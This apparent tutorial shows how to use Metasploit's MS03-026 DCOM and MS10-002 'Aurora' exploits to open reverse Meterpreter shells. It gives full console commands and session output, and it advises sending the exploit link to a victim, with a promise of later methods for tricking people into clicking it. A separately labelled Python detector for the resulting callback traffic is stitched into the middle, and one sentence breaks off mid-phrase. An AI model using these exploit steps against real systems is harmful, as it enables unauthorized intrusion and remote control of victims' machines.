This module exploits a stack buffer overflow in the RPC Service. It can exploit English versions of:
- Windows NT 4.0 SP3
- Windows 2000
- Windows XP
- Windows 2003
Default port: 135
Okay, let's start.
Type:
Code:
use exploit/windows/dcerpc/ms03_026_dcom
Now set the payload:
Code:
set payload windows/meterpreter/reverse_tcp
Next, we need to see which options have to be set. Set LHOST to your local IP, RHOST to the victim's IP, and LPORT to the port the payload should connect back to.
Code:
set lhost 192.168.2.100
set rhost 192.168.2.105
set lport 4444
Now type exploit. If the attack succeeds, a Meterpreter session opens.
Code:
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set rhost 192.168.2.105
rhost => 192.168.2.105
msf exploit(ms03_026_dcom) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms03_026_dcom) > set lport 4443
lport => 4443
msf exploit(ms03_026_dcom) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf exploit(ms03_026_dcom) > exploit
[*] Started reverse handler on 192.168.2.103:4443
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...
[*] Sending exploit ...
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012
Aurora is a browser-based exploit: the payload is delivered through the browser on the victim machine. Aurora exploits a memory corruption flaw in Internet Explorer 6. It is very outdated, but I picked this one for its historical value. It was used in Operation Aurora by a group of hackers who compromised a large number of major
Let's start by choosing aurora.
Code:
use exploit/windows/browser/ms10_002_aurora
Next, set the payload to a reverse Meterpreter.
Code:
set payload windows/meterpreter/reverse_tcp
Now set LHOST and LPORT (for the payload) and SRVHOST (for the Aurora web server). LHOST and SRVHOST have to be the same address. You can also change SRVPORT, or leave it at the default of 8080.
Code:
set lhost 192.168.2.103
set lport 4444
set srvhost 192.168.2.103
You can also change URIPATH, which decides what the link looks like. If you leave it unset, Metasploit appends a random string to the end of the URL, like:
http://192.168.2.103:8080/jghsajksauf
So we are going to change it to /.
Code:
set uripath /
Type exploit and the server starts. Send the generated link to someone, and a Meterpreter session will open when they visit it. I will later show advanced methods of tricking a victim into opening it.
Example:
Code:
msf > search aurora
Matching Modules
================

   Name                                     Disclosure Date  Rank    Description
   ----                                     ---------------  ----    -----------
   exploit/windows/browser/ms10_002_aurora  2010-01-14       normal  Internet Explorer "Aurora" Memory Corruption

msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf exploit(ms10_002_aurora) > set lport 4444
lport => 4444
msf exploit(ms10_002_aurora) > set srvport 80
srvport => 80
msf exploit(ms10_002_aurora) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     192.168.2.103    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST     192.168.2.103    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms10_002_aurora) > set uripath /
uripath => /
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf exploit(ms10_002_aurora) > [*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.2.105
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012
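Seen from the victim's network rather than the msfconsole, both transcripts above leave the same trace: the victim host exchanges traffic with a peer on the exploited service port (TCP/135 for the DCOM module, the SRVPORT web server for Aurora) and seconds later opens a brand-new outbound TCP connection back to that same peer on the payload's LPORT (4444 in both runs). The detector below is an added example, not part of this tutorial or of Metasploit; it correlates that two-step sequence over constructed firewall-style connection records whose CSV layout, timestamps and 60-second window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Ports of the services exploited in the two transcripts: TCP/135 (RPC/DCOM) and the
# Aurora module's SRVPORT (80 in the transcript, 8080 by default).
SERVICE_PORTS = {135, 80, 8080}
WINDOW = timedelta(seconds=60)  # assumed correlation window between service hit and callback

# Constructed firewall-style record layout (an assumption): ts,src,sport,dst,dport
LINE_RE = re.compile(r"^(?P<ts>\S+),(?P<src>[\d.]+),(?P<sport>\d+),(?P<dst>[\d.]+),(?P<dport>\d+)$")

def parse(lines):
    recs = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than crash the detector
        recs.append({"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S"),
                     "src": m["src"], "dst": m["dst"], "dport": int(m["dport"])})
    return sorted(recs, key=lambda r: r["ts"])

def find_callbacks(records):
    """Return (victim, peer, service_port, callback_port) for every host that talked with
    a peer on a service port and then opened a new outbound connection to that peer."""
    alerts = []
    for i, cb in enumerate(records):
        if cb["dport"] in SERVICE_PORTS:
            continue  # only a non-service destination port counts as a possible callback
        victim, peer = cb["src"], cb["dst"]
        for prior in records[:i]:
            if cb["ts"] - prior["ts"] > WINDOW or prior["dport"] not in SERVICE_PORTS:
                continue
            inbound = prior["src"] == peer and prior["dst"] == victim    # DCOM: peer -> victim:135
            outbound = prior["src"] == victim and prior["dst"] == peer   # Aurora: victim -> peer:80
            if inbound or outbound:
                alerts.append((victim, peer, prior["dport"], cb["dport"]))
                break
    return alerts

SAMPLE_LOG = [  # constructed to mirror the two transcripts; addresses and ports taken from them
    "2012-01-31T21:35:30,192.168.2.103,50123,192.168.2.105,135",  # attacker binds to RPC
    "2012-01-31T21:35:35,192.168.2.105,1098,192.168.2.103,4444",  # victim calls back (DCOM)
    "2012-01-31T21:40:01,192.168.2.105,1101,192.168.2.103,80",    # victim fetches Aurora URL
    "2012-01-31T21:40:03,192.168.2.105,1102,192.168.2.103,4444",  # victim calls back (Aurora)
    "2012-01-31T21:41:00,192.168.2.107,1200,192.168.2.1,80",      # ordinary browsing, no callback
]

if __name__ == "__main__":
    for a in find_callbacks(parse(SAMPLE_LOG)):
        print("possible reverse shell: %s -> %s after service port %d, callback port %d" % a)
```

The port list and window are a starting heuristic; a callback to 443 or one delayed past the window would need the rule widened.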
More Info:
Code:
Name: Internet Explorer "Aurora" Memory Corruption
Module: exploit/windows/browser/ms10_002_aurora
Version: 14034
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
unknown
hdm <hdm@metasploit.com>
Available targets:
   Id  Name
   --  ----
   0   Automatic

Basic options:
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)
Payload information:
Space: 1000
Avoid: 1 characters
Description:
This module exploits a memory corruption flaw in Internet Explorer.
This flaw was found in the wild and was a key component of the
"Operation Aurora" attacks that lead to the compromise of a number
of high profile companies. The exploit code is a direct port of the
public sample published to the Wepawet malware analysis site. The
technique used by this module is currently identical to the public
sample, as such, only Internet Explorer 6 can be reliably exploited.